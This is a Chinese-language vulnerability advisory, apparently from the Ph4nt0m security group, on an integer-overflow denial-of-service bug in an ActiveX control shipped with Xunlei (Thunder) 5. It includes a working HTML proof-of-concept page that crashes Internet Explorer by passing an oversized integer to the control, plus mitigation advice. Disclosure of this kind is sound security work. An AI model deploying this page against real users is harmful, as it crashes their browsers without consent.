迅雷5 ThunderAgent Module 远程拒绝服务漏洞
文章作者: Axis (axis_at_ph4nt0m.org)<br /><a href="http://www.ph4nt0m.org/" target="_blank">[url]http://www.ph4nt0m.org[/url]</a><br /><br /><br />摘要:<br /><br />迅雷是由Thunder Networking公司开发的一个下载软件,在中国有着非常广泛的用户。迅雷5的ThunderAgent_005.dll中注册了一个activex控件,当Internet Explorer调用他的某些方法时,将会造成整数溢出,成功利用将造成Internet Explorer崩溃。<br /><br /><br /><br />影响版本:<br /><br />迅雷5.5.2.252(已测试),<br />迅雷5.5.3.264(2006-12月最新版本已测试,受影响的dll变成ThunderAgent_007.dll)<br />其他版本可能也受影响<br /><br /><br /><br />细节:<br /><br />在ThunderAgent_005.dll中,有两处方法调用时忽略了输入参数异常的情况,当输入参数为精心构造的负数或大整数时,将造成整数溢出,产生不可预料的结果,从而造成浏览器崩溃。<br /><br />该Activex注册控件的Object Classid是 {485463B7-8FB2-4B3B-B29B-8B919B0EACCE}<br />Method原型如下:<br /><br />[id(0x00000006), helpstring("method GetInfoStruct")]<br />void GetInfoStruct([in] int pInfo);<br /><br /><br />[id(0x00000007), helpstring("method GetTaskInfoStruct")]<br />void GetTaskInfoStruct([in] int pTaskInfo);<br /><br /><br /><br />Codz: <table cellspacing="1" cellpadding="8" width="95%" align="center" bgcolor="#000000" border="0"><tbody><tr><td bgcolor="#ffffff"><code><font color="#000000"><font color="#0000bb"><br /><font face="新宋体">POC</font></font><font face="新宋体"><font color="#007700">: <br /><br />---------------------------------------------------------------------------------------- <br /><</font><font color="#0000bb">html</font></font><font face="新宋体"><font color="#007700">> <br /><</font><font color="#0000bb">head</font></font><font face="新宋体"><font color="#007700">> <br /> <br /><</font><font color="#0000bb">script</font></font><font face="新宋体"><font color="#007700">> <br />function </font><font color="#0000bb">AxisFun</font></font><font face="新宋体"><font color="#007700">() <br />{ <br /><br /></font><font color="#0000bb">evil</font><font color="#007700">.</font><font color="#0000bb">GetTaskInfoStruct</font><font color="#007700">(</font><font color="#0000bb">0x7fffffff</font></font><font face="新宋体" color="#007700">); <br /><br />} <br /></font><font face="新宋体"><font color="#0000bb"></script> <br /></font></head> <br /><br /><OBJECT ID="evil" CLASSID="CLSID:{485463B7-8FB2-4B3B-B29B-8B919B0EACCE}"></OBJECT> <br /><br /><br /><script>java script:AxisFun();</script> <br /><br /></html> <br /><br />----------------------------------------------------------------------------------------<br /></font></font></code></td></tr></tbody></table><br /><br />建议:<br /><br />禁止ie执行activex<br /><br /><br />厂商补丁:<br />目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:<br /><br /><a href="http://www.xunlei.com/" target="_blank">[url]http://www.xunlei.com[/url]</a><br /><br /><br /><br />关于Ph4nt0m:<br />Ph4nt0m是国内的一个安全组织,由一群来自五湖四海的朋友,因为共同热爱网络安全而走到一起来。<br />欢迎访问我们的网站<a href="http://www.ph4nt0m.org/" target="_blank">[url]http://www.ph4nt0m.org[/url]</a><br /><br /><br /><br />--EOF--页:
[1]